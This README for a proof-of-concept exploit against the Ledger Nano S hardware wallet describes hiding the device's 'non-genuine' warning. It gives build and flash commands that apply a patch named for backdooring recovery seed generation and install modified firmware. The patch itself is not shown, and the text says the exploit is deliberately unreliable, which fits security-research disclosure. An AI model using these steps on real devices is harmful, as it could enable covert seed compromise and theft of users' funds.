Proof-of-concept exploit for the Ledger Nano S that hides the non-genuine user interface confirmation. Intentionally unreliable to avoid weaponization.
It should be trivial to adapt to the Ledger Blue.
-
Build the modified application (
nanos-131
is for firmware 1.3.1)
git clone https://github.com/LedgerHQ/nanos-ui.git -b nanos-131
cd nanos-ui
git apply ../backdoor-recovery-seed-generation.patch
make
-
Turn on the Ledger Nano S with the right button held until "Recovery" is displayed
-
Install the modified application
make load
- (To remove the modified application)
make delete
-
Turn on the Ledger Nano S with the left button held until "Bootloader" is displayed
-
Build and install the modified firmware
make vendor
make load
- (To restore the official firmware)
make delete